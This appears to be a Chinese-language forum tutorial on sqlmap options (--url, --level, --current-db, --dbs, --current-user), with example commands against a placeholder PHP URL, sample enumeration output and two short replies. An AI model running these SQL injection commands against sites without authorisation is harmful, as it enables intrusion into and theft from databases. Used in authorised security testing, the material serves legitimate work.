sqlmap用法
sqlmap用法【-u/--url="url"】 #后面接目标网址,表示测试的目标地址。
【-v/--level=number】 #number=,表示测试结果的详细程度。数值越大,内容越详细。
sqlmap.py -u “url”-v 0-5
或
sqlmap.py --url="url" --level=0-5
通过以上参数,会得到:
1、目标的操作系统信息
2、数据库的类型、版本号
3、Web服务器版本、版本号
4、支持的脚本类型
Example:
sqlmap.py --url="http://www.xxxx.com/index.php?ID=111" --level=1
sqlmap.py -u "http://www.xxxx.com/index.php?ID=111" --v 1
Result:
web server operating system: Linux Red Hat Enterprise 3 (Taroon)
web application technology: PHP 4.3.2, Apache 2.0.46
back-end DBMS: MySQL 4
【--current-db】 #表示获取当前数据库的名称。但实测中对Access的数据库不能获得数据库名称
sqlmay.py --url="url" --current-db
通过以上参数,会得到:
1、当前所用的数据库的名称
Example:
sqlmap.py --url="http://www.xxxx.com/index.php?ID=111" --current-db
Result:
current database: 'greenbergdevDB'
【--dbs】#列举所有的数据库名单。我这里只列出来一个。可能是因为权限的问题。
sqlmap.py --url="url" --dbs
Exampl:
sqlmap.py --url="http://www.xxxx.com/index.php?ID=111" --dbs --level=1
Result:
available databases :
# greenbergdevDB
【--current-user】 #表示获取当前数据库的用户名
sqlmap.py --url="url" --current-user
通过以上参数,会得到:
1、当前数据库的用户名
Example:
sqlmap.py --url="http://www.xxxx.com/index.php?ID=111" --current-user --level
Result:
current user: '********@localhost' 感谢LZ的分享~ lalallal 那个php的网址是怎么得到的,我这边的网址都没有这样的后缀啊,抓包出来的也没有
页:
[1]
